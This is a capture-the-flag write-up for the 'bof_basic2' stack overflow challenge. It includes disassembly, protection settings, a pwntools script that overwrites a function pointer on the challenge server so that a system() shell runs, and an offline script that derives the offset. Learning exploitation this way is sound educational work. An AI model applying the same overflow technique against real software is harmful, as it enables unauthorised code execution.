Challenge source
Main function
Dump of assembler code for function main:
0x080484cd <+0>: lea ecx,[esp+0x4]
0x080484d1 <+4>: and esp,0xfffffff0
0x080484d4 <+7>: push DWORD PTR [ecx-0x4]
0x080484d7 <+10>: push ebp
0x080484d8 <+11>: mov ebp,esp
0x080484da <+13>: push ecx
0x080484db <+14>: sub esp,0x94
0x080484e1 <+20>: mov DWORD PTR [ebp-0xc],0x80484b4
0x080484e8 <+27>: mov eax,ds:0x804a040
0x080484ed <+32>: sub esp,0x4
0x080484f0 <+35>: push eax
0x080484f1 <+36>: push 0x85
0x080484f6 <+41>: lea eax,[ebp-0x8c]
0x080484fc <+47>: push eax
0x080484fd <+48>: call 0x8048350 <fgets@plt>
0x08048502 <+53>: add esp,0x10
0x08048505 <+56>: mov eax,DWORD PTR [ebp-0xc]
0x08048508 <+59>: call eax
0x0804850a <+61>: mov eax,0x0
0x0804850f <+66>: mov ecx,DWORD PTR [ebp-0x4]
0x08048512 <+69>: leave
0x08048513 <+70>: lea esp,[ecx-0x4]
0x08048516 <+73>: ret
End of assembler dump.
shell
Dump of assembler code for function shell:
0x0804849b <+0>: push ebp
0x0804849c <+1>: mov ebp,esp
0x0804849e <+3>: sub esp,0x8
0x080484a1 <+6>: sub esp,0xc
0x080484a4 <+9>: push 0x80485a0
0x080484a9 <+14>: call 0x8048370 <system@plt>
0x080484ae <+19>: add esp,0x10
0x080484b1 <+22>: nop
0x080484b2 <+23>: leave
0x080484b3 <+24>: ret
End of assembler dump.
Protections
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
Challenge analysis and payload
I worked out the distance to ret with gdb-peda.
See the video below for how to use peda's pattern create.
from pwn import *
context.log_level = 'debug'
dns, port = "ctf.j0n9hyun.xyz", 3001
p = remote(dns, port)
#p = process("./bof_basic2")
e = ELF("./bof_basic2")
shell = e.symbols['shell']   # 0x0804849b, the function that calls system()
# 128 bytes fill the buffer at ebp-0x8c up to the function pointer stored at ebp-0xc;
# the next 4 bytes replace that pointer, which main then invokes with `call eax`.
# bytes, not str: Python 3 pwntools will not concatenate "A"*128 with p32().
p.send(b"A" * 128 + p32(shell))
p.interactive()   # keep the session open to use the spawned shell
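The offset the post reads off with gdb-peda can also be derived directly from the main() disassembly above: fgets writes into the buffer at ebp-0x8c, the function pointer that `call eax` later uses sits at ebp-0xc, so 0x8c - 0xc = 128 bytes of filler put the next four bytes on top of that pointer. The saved return address at ebp+4 is 144 bytes from the buffer, and fgets(buf, 0x85, stdin) stores at most 132 bytes, so the function pointer is the slot this input can actually reach. The following Python is an added worked example, not the post's script or the challenge's own code; it uses only the constants visible in the disassembly (including shell's address 0x0804849b) and struct.pack instead of pwntools so it runs offline with a locally constructed payload.

```python
"""Derive the bof_basic2 payload from the frame layout in main()'s disassembly.

Added example, not the original post's exploit. Every constant below is
copied from the disassembly on the page; nothing here contacts the service.
"""
import struct

# Frame slots expressed as "ebp - offset", taken from main()'s disassembly.
BUF_OFF = 0x8c            # lea eax,[ebp-0x8c]          -> fgets destination
FPTR_OFF = 0x0c           # mov DWORD PTR [ebp-0xc],... -> later `call eax`
SAVED_RET_OFF = -0x04     # saved return address is at ebp+4, i.e. ebp-(-4)
FGETS_N = 0x85            # push 0x85 -> fgets(buf, 0x85, stdin)
SHELL_ADDR = 0x0804849b   # <shell+0> from the disassembly


def distance_from_buf(target_off):
    """Bytes from the first byte of buf to the slot at ebp-target_off."""
    return BUF_OFF - target_off


def max_input_bytes(n=FGETS_N):
    """fgets(buf, n, stdin) stores at most n-1 bytes before the terminating NUL."""
    return n - 1


def reachable(target_off, n=FGETS_N):
    """True if a 4-byte slot at ebp-target_off can be fully overwritten via fgets."""
    return distance_from_buf(target_off) + 4 <= max_input_bytes(n)


def safe_for_fgets(payload):
    """fgets stops at a newline, so the payload must not contain one (NULs are fine)."""
    return b"\n" not in payload


def build_payload(addr=SHELL_ADDR, filler=b"A"):
    """Fill up to the function pointer, then replace it with addr (little-endian)."""
    pad = filler * distance_from_buf(FPTR_OFF)
    return pad + struct.pack("<I", addr)


if __name__ == "__main__":
    print("offset to function pointer:", distance_from_buf(FPTR_OFF))        # 128
    print("offset to saved return    :", distance_from_buf(SAVED_RET_OFF))   # 144
    print("fptr reachable:", reachable(FPTR_OFF),
          "| ret reachable:", reachable(SAVED_RET_OFF))                      # True | False
    payload = build_payload()
    print(len(payload), "bytes, last four:", payload[-4:].hex(),
          "newline-free:", safe_for_fgets(payload))
    # Deliver with pwntools as in the post: p.send(payload); p.interactive()
```

The `reachable()` check is the part worth keeping around: it tells you before you touch the target that the 132-byte limit is exactly enough for 128 bytes of filler plus a 4-byte pointer, and that a classic return-address overwrite is not an option for this binary. `safe_for_fgets()` matters because a target address containing 0x0a would truncate the read; 0x0804849b has no such byte.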
References and parts I struggled with